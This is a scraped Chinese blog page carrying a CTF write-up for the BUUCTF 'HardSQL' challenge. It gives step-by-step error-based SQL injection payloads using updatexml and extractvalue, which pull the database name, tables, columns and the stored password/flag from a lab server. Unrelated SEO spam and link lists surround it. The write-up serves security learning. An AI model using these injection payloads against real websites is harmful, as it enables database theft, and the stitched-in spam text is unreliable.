当前位置: 首页 > news >正文

百度网页版登录长春关键词优化平台

百度网页版登录,长春关键词优化平台,dedecms调取友情链接 网站类型,个体户做网站是怎么备案题目 打开页面显示为 查看源代码没有发现其他的提示信息#xff0c;随便尝试一下 错误 题目名为hardsql#xff0c;先来尝试有无sql注入存在 尝试输入单引号输入 显示页面存在注入 这里按照常规思路继续使用order by函数和union select函数进行查询#xff0c;但是页面没有…题目 打开页面显示为 查看源代码没有发现其他的提示信息随便尝试一下 错误 题目名为hardsql先来尝试有无sql注入存在 尝试输入单引号输入 显示页面存在注入 这里按照常规思路继续使用order by函数和union select函数进行查询但是页面没有任何显示 上述测试闭合时返回了错误信息用bp抓包看一下过滤的发现用于报错的注入函数没有被过滤 使用updatexml 通过查询可知updatexml在执行时第二个参数应该为合法的xpath路径否则会引发报错的同时将传入的参数进行输出 先查询数据库构造payload http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?usernameadmin%27or(updatexml(1,concat(0x7e,database(),0x7e),1))%23password123 可得知数据库名为geek 查询表构造payload http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?usernameadmin%27or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23password123 得到表 查字段构造payload http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?usernameadmin%27or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))%23password123 可以得到字段名 然后查询想要的字段 构造payload http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?usernameadmin%27or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(H4rDsq1)),0x7e),1))%23password123 发现flag显示不全函数显示有字符数限制 使用right可得到另一半 构造payload http://7e5d1a53-23d2-4466-a553-66a204aaac29.node4.buuoj.cn:81/check.php?usernameadmin%27or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))%23password123 使用extractvalue 这里空格和没有使用()代替空格使用like代替 查数据库 构造payload /check.php?usernameadminpassword123^extractvalue(1,concat(0x7e,(select(database()))))%23查表 构造payload /check.php?usernameadminpassword123^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like(geek)))))%23查字段 构造payload /check.php?usernameadminpassword123^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like(H4rDsq1)))))%23查数据 /check.php?usernameadminpassword123^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23这里也是显示不全按照上面的updatexml后的方法进行补全即可 参考文章链接 buuctf-[极客大挑战 2019]HardSQL(小宇特详解)_小宇特详解的博客-CSDN博客 https://www.cnblogs.com/GTL-JU/p/16042242.html https://www.cnblogs.com/upfine/p/16578800.html
http://www.w-s-a.com/news/546943/

相关文章:

  • 监控视频做直播网站中国建筑人才网下载
  • 网站建设公司华网天下买送活动集团网站设计案例
  • 哪些网站比较容易做哪个网站做中高端衣服
  • 做php网站教程wordpress去水印
  • 深圳微网站建设公司哪家好潍坊专业做网站的公司
  • 网站的弹窗广告怎么做软件开发包括
  • 网站开发人员保密做最优秀的自己演讲视频网站
  • 一般做网站要多少钱怎样选择高性价比的建站公司
  • 免费私人网站建设软件高端网站设计平台高端网站设计企业
  • 响应式网站建设的应用场景怎么申请电商平台
  • 怎么做垂直自营网站游戏咨询网站建设目标是什么
  • 建设网站需要给钱吗建立网站三大基础
  • 金融公司网站 htmlwordpress 防火墙
  • 重庆智能建站模板网站投票系统 js
  • 网站维护的内容和步骤网站做什么内容
  • 万网虚拟主机建网站wordpress协调世界时
  • 微网站建设方式应用大全网站
  • 网站速度测速织梦模板下载
  • 环保网站建设公司排名汉阴网站建设
  • 自己做网站的二维码wordpress用户权限在哪改
  • 网站使用说明书网站建设公司的介绍
  • 推广型网站免费建设网站防盗链设置
  • 建设银行网站查开户行网站反链暴增怎么回事
  • centos7做网站软件实施工程师工资一般多少
  • 专业房产网站建设深圳建设交易集团
  • 政务网站建设标准项目经理接到网站开发怎么开展
  • 网站框架设计好后怎么做网站广告销售怎们做
  • asp技校网站保定八大平台公司
  • wordpress网站前端优化网站备案批量查询
  • 北京企业做网站杭州seo中心